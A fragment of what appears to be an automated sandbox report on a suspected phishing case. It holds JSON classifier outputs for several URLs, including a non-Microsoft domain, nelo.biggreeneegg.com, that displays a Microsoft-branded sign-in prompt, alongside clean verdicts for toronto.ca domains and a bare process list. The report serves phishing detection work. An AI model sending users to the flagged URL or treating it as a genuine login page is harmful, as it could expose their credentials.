"trigger_text": "Please contact the City of Toronto's IT Service Desk at 416-338-2255 or techservice@toronto.ca for more information.",
"prominent_button_name": "Click here to continue",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://nelo.biggreeneegg.com/?sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "We couldn't find an account with that username. Try another, or get a new Microsoft account.",
"prominent_button_name": "Next",
"text_input_field_labels": [
"admin@toronto.ca"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://cotauth.toronto.ca Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://cotauth.toronto.ca |
| URL: https://nelo.biggreeneegg.com/?sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://cotauth.toronto.ca/my.policy Model: Joe Sandbox AI | {
"brands": [
"Toronto"
]
} |
|
| URL: https://toronto.ca Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://toronto.ca |
Edit tour
rundll32.exe (PID: 1092 cmdline: 
OUTLOOK.EXE (PID: 2816 cmdline: 
ai.exe (PID: 6284 cmdline: 
chrome.exe (PID: 7084 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node